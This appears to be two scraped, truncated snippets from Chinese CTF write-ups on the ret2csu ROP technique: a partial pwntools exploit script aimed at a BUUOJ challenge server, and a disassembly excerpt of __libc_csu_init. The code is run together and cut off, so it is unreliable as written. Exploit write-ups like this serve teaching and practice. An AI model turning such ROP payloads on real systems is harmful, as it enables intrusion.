看了一下,然后根据不同参数去不同的寄存器,排一下就出来了 frompwnimport* #p=process('./pwn1') p=remote('node4.buuoj.cn',25708) bincat=0x4007bbp.recvuntil('it!\n') gadget1=0x400710gadget2=0x40072apayload=b'a'*0x28+p64(gadget2)+p64(0)+p64(1)+p64(0x601068)+p64(bincat)+p64...
利用ret2csu的方法实现ROP。 __libc_csu_init proc near ; DATA XREF: _start+16↑o .text:0000000000400840 ; __unwind { .text:0000000000400840 push r15 .text:0000000000400842 push r14 .text:0000000000400844 mov r15, rdx .text:0000000000400847 push r13 .text:0000000000400849 push r12 .text:0000000000...